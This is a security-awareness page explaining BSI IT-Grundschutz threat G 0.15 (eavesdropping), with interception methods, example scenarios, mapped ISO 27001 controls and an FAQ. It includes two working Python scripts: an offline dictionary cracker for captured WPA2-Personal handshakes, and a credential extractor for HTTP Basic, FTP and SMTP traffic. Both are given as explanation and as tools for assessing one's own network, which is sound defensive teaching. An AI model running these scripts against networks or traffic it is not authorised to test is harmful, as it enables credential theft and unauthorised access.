Elementary Threat · BSI IT-Grundschutz

G 0.15 — Eavesdropping

4 min read · Reviewed by: Cenedril Editorial

Unencrypted emails are postcards. Anyone with access to a transmission path — a network technician, a compromised router, an attacker on the same Wi-Fi — can read along. This applies to the entire path from sender to recipient, across every single intermediate hop.

Eavesdropping is the targeted interception of communication — from simply overhearing a conversation to the technically complex interception of radio and line signals. The BSI lists this threat as G 0.15.

What’s behind it?

Every communication link — whether copper cable, fibre optic, Wi-Fi or mobile network — is fundamentally tappable. There are no tap-proof cables; only the required effort differs. Whether an attacker invests that effort depends on how valuable the information is and how high the detection risk turns out to be.

Interception methods

  • Network sniffing — in unswitched (hub or shared-medium) networks an attacker sees all traffic directly; in switched LANs they redirect it to their own port via ARP spoofing or a mirror (SPAN) port. Particularly critical: plain-text protocols such as HTTP, FTP and Telnet transmit passwords without any protection, so a single capture yields working credentials.
  • Wi-Fi eavesdropping — insufficiently secured wireless networks (open hotspots, the long-broken WEP) allow the capture of all communication. Even WPA2-Personal networks are vulnerable: an attacker records the four-way handshake once and then tests passphrases against it offline, without sending another frame. A short or dictionary passphrase is recovered quickly; only the passphrase strength (or WPA2-Enterprise with per-user credentials, or WPA3) protects the traffic.
  • Telephony interception — VoIP calls transmitted unencrypted over the network (SIP signalling, RTP media) can be captured and replayed with freely available tools. For classical telephony, physical access to the line is enough.
  • Wire tapping — copper cables can be tapped inductively without physically cutting the line. For fibre optic the effort is higher but in principle possible (fibre tapping, typically by bending the fibre so that a fraction of the light leaks out). Whether a line is being tapped can only be determined with considerable measurement effort.
  • Interception via compromised infrastructure — routers, switches and firewalls on which an attacker has gained access can serve as tap points. Packet captures or port mirroring then deliver the entire data traffic passing through.
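The WPA2-Personal point above is worth seeing in code: once the four-way handshake is captured, every guess costs the attacker only local CPU time. The following Python is an added example, not code from the BSI or from this page. The SSID, MAC addresses, nonces and EAPOL frame are constructed; the derivation steps (PBKDF2 to the PMK, the 802.11 PRF to the PTK, HMAC-SHA1-128 over the EAPOL frame for the MIC) follow IEEE 802.11i for WPA2-CCMP.

```python
"""Why a captured WPA2-Personal handshake can be brute-forced offline.

Added example with constructed values: the access point, client, nonces and
EAPOL frame below are made up. The key derivation follows IEEE 802.11i for
WPA2-CCMP (key descriptor version 2, HMAC-SHA1-128 MIC).
"""
import hashlib
import hmac
from typing import List, Optional

SSID = b"Hotel-Guest"                    # constructed network name
AP_MAC = bytes.fromhex("001122334455")   # constructed authenticator address
STA_MAC = bytes.fromhex("66778899aabb")  # constructed supplicant address
ANONCE = bytes(range(32))                # constructed nonces from the capture
SNONCE = bytes(range(32, 64))
# Constructed EAPOL-Key frame (message 2 of the handshake) with the 16-byte
# MIC field zeroed, which is how the frame is fed into MIC verification.
EAPOL_MSG2 = bytes.fromhex("0103007502010a00" + "00" * 117)


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the only expensive step, and it is fully offline."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf384(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-384: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..2."""
    out = b""
    for i in range(3):  # 3 * 20 bytes covers the 48 bytes needed
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:48]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min/max of MACs and nonces)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf384(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """CCMP: MIC = HMAC-SHA1(KCK, frame with MIC field zeroed), truncated to 16 bytes."""
    return hmac.new(kck, frame, hashlib.sha1).digest()[:16]


def handshake_mic(passphrase: str) -> bytes:
    """The MIC a legitimate client places in message 2 for a given passphrase."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    ptk = ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)
    kck = ptk[:16]  # Key Confirmation Key is the first 128 bits of the PTK
    return eapol_mic(kck, EAPOL_MSG2)


def crack(captured_mic: bytes, wordlist: List[str]) -> Optional[str]:
    """Offline dictionary attack: recompute the MIC per candidate and compare it
    to the one in the capture. Nothing is transmitted; the AP never notices."""
    for candidate in wordlist:
        if hmac.compare_digest(handshake_mic(candidate), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed scenario: the network owner chose a weak passphrase and the
    # attacker recorded message 2 of the handshake.
    captured = handshake_mic("summer2024")
    print(crack(captured, ["password", "12345678", "summer2024", "letmein!"]))
```

Real tools (aircrack-ng, hashcat) do exactly this, only faster and on GPUs; a 4096-iteration PBKDF2 slows each guess but does not change the outcome for a guessable passphrase. This is why the recommendation is a long random passphrase, WPA2-Enterprise or WPA3 rather than "WPA2 is enabled".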

Impact

Intercepted information includes access credentials, business communications, personal data and technical configurations. Particularly dangerous is the interception of authentication data on plain-text protocols, because an attacker thereby gains direct access to systems. The transition to active attack (identity theft, manipulation) is seamless.

Practical examples

Wi-Fi sniffing in a hotel. A business traveller uses the open Wi-Fi in a hotel to retrieve emails and log in to the company VPN. An attacker on the same Wi-Fi performs a man-in-the-middle attack and captures the VPN credentials. With those the attacker gains access to the corporate network and exfiltrates data unnoticed for weeks. This only works if the VPN client does not verify the gateway's identity (or the user clicks through a certificate warning) and the login is a password alone; strict certificate validation plus a second factor turns the captured credentials into a dead end.

Inductive tapping of network cabling. In an office building with multiple tenants, network cables run through shared cable ducts. An attacker places an inductive tap on a copper cable and captures the data traffic. Since the internal network is unencrypted, they capture login credentials, emails and database queries in plain text.

VoIP capture via compromised switch. An attacker exploits a vulnerability in the web interface of a network switch to gain administrative rights. They enable port mirroring and send a copy of all VoIP traffic to their machine. Business negotiations, HR conversations and strategic planning are recorded over weeks.

Relevant controls

The following ISO 27001 controls mitigate this threat. (You’ll find the complete list of 27 mapped controls below in the section “ISO 27001 Controls Covering This Threat”.)

Prevention:

Detection:

Response:

BSI IT-Grundschutz

The BSI IT-Grundschutz catalogue links G 0.15 to the following modules:

  • NET.1.2 (Network management) — requirements for the secure administration of network components.
  • NET.2.1 (Wi-Fi operation) — security requirements for wireless networks, including encryption and authentication.
  • OPS.1.1.7 (System management) — secure remote maintenance and system administration.
  • INF.12 (Cabling) — physical protection of network and building cabling.

Sources

ISO 27001 Controls Covering This Threat

  • A.5.14 Information transfer
  • A.5.15 Access control
  • A.5.16 Identity management
  • A.5.17 Authentication information
  • A.5.18 Access rights
  • A.5.23 Information security for use of cloud services
  • A.5.29 Information security during disruption
  • A.6.7 Remote working
  • A.7.6 Working in secure areas
  • A.7.9 Security of assets off-premises
  • A.7.11 Supporting utilities
  • A.7.12 Cabling security
  • A.7.14 Secure disposal or re-use of equipment
  • A.8.1 User endpoint devices
  • A.8.3 Information access restriction
  • A.8.4 Access to source code
  • A.8.5 Secure authentication
  • A.8.6 Capacity management
  • A.8.7 Protection against malware
  • A.8.10 Information deletion
  • A.8.14 Redundancy of information processing facilities
  • A.8.15 Logging
  • A.8.16 Monitoring activities
  • A.8.18 Use of privileged utility programs
  • A.8.20 Networks security
  • A.8.21 Security of network services
  • A.8.22 Segregation of networks

Frequently asked questions

Is wire tapping really still relevant?

Yes. Unencrypted protocols such as HTTP, FTP or Telnet transmit access credentials in plain text. In internal networks, encryption is often omitted because the line is assumed to be secure. An attacker with physical access to the cabling, a foothold on any host in the same broadcast domain, or control over a compromised switch can read the entire traffic, and credentials recovered this way are immediately usable.
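Both the "plain-text protocols" bullet above and this answer come down to the same check: does anything on the internal network still carry credentials in the clear? The following Python is an added example (not code from the BSI or this page) that extracts credentials from captured client-to-server payloads for HTTP Basic authentication, FTP and SMTP AUTH PLAIN. The captured streams are constructed to look like sniffer output; the same functions can be run over real decoded TCP streams from your own capture.

```python
"""Find credentials sent in the clear in captured TCP payloads.

Added example. The streams below are constructed samples of what a sniffer on
an internal network records; the decoders follow the protocol formats
(RFC 7617 HTTP Basic, RFC 959 FTP USER/PASS, RFC 4616 SASL PLAIN).
"""
import base64
import binascii
import re
from typing import List, Optional, Tuple

# Constructed captures: (stream label, raw client -> server bytes)
SAMPLE_STREAMS = [
    ("10.0.1.17 -> 10.0.1.5 tcp/80",
     b"GET /admin HTTP/1.1\r\nHost: intranet.example\r\n"
     b"Authorization: Basic YWxpY2U6U3VtbWVyMjAyNCE=\r\n\r\n"),
    ("10.0.1.17 -> 10.0.1.9 tcp/21",
     b"USER backup\r\nPASS Backup#2024\r\nSYST\r\n"),
    ("10.0.1.17 -> 10.0.1.25 tcp/25",
     b"EHLO laptop\r\nAUTH PLAIN AGJvYgBzM2NyM3Q=\r\n"),
    ("10.0.1.17 -> 10.0.1.5 tcp/443",
     b"\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03"),  # TLS ClientHello: nothing readable
]

HTTP_BASIC = re.compile(rb"^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", re.M | re.I)
FTP_USER = re.compile(rb"^USER\s+(\S+)", re.M)
FTP_PASS = re.compile(rb"^PASS\s+(\S+)", re.M)
SMTP_PLAIN = re.compile(rb"^AUTH\s+PLAIN\s+([A-Za-z0-9+/=]+)", re.M | re.I)

Credential = Tuple[str, str, str]  # (protocol, username, password)


def _b64(token: bytes) -> Optional[bytes]:
    """Strict base64 decode; malformed tokens are skipped rather than misreported."""
    try:
        return base64.b64decode(token, validate=True)
    except (ValueError, binascii.Error):
        return None


def _text(raw: bytes) -> str:
    return raw.decode("utf-8", errors="replace")


def extract_credentials(payload: bytes) -> List[Credential]:
    """Return every plaintext credential found in one client -> server payload."""
    found: List[Credential] = []

    # HTTP Basic: base64("user:password") in the Authorization header
    for m in HTTP_BASIC.finditer(payload):
        raw = _b64(m.group(1))
        if raw and b":" in raw:
            user, pw = raw.split(b":", 1)
            found.append(("http-basic", _text(user), _text(pw)))

    # FTP: USER and PASS are separate commands, paired in order of appearance
    for user, pw in zip(FTP_USER.findall(payload), FTP_PASS.findall(payload)):
        found.append(("ftp", _text(user), _text(pw)))

    # SMTP AUTH PLAIN: base64(authzid NUL authcid NUL password)
    for m in SMTP_PLAIN.finditer(payload):
        raw = _b64(m.group(1))
        if raw and raw.count(b"\x00") == 2:
            _authzid, user, pw = raw.split(b"\x00")
            found.append(("smtp-auth-plain", _text(user), _text(pw)))

    return found


def scan(streams: List[Tuple[str, bytes]]) -> List[Tuple[str, str, str, str]]:
    """Run the extractor over every stream; returns (stream, protocol, user, password)."""
    report = []
    for label, payload in streams:
        for proto, user, pw in extract_credentials(payload):
            report.append((label, proto, user, pw))
    return report


if __name__ == "__main__":
    for label, proto, user, pw in scan(SAMPLE_STREAMS):
        # In a real assessment, mask the password before writing any report.
        print(f"{label}: {proto} user={user!r} password={'*' * len(pw)}")
```

Only the client-to-server direction is needed for these three protocols; Telnet logins are interleaved with server prompts and need both directions reassembled. Encrypted streams (the TLS sample) yield nothing, which is exactly the property the answer above is asking for.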

How do I detect whether a line is being tapped?

In practice this is extremely difficult and requires elaborate measurement techniques. That's why the focus is on prevention: encryption of all communication channels makes intercepted content worthless, regardless of whether an attack takes place or not. Note that encryption protects the content, not the metadata: who talks to whom, when and how much remains visible to anyone on the path.

Is HTTPS alone sufficient to protect against eavesdropping?

HTTPS reliably protects data in transit between the browser and the TLS endpoint it connects to. It does not, however, protect against eavesdropping on the end device itself (malware, a malicious browser extension), on the hop behind a TLS-terminating load balancer or proxy where traffic often continues as plain HTTP, or when the client accepts an invalid or attacker-controlled certificate. Full protection requires end-to-end encryption, strict certificate validation on the client and regular review of the TLS configuration.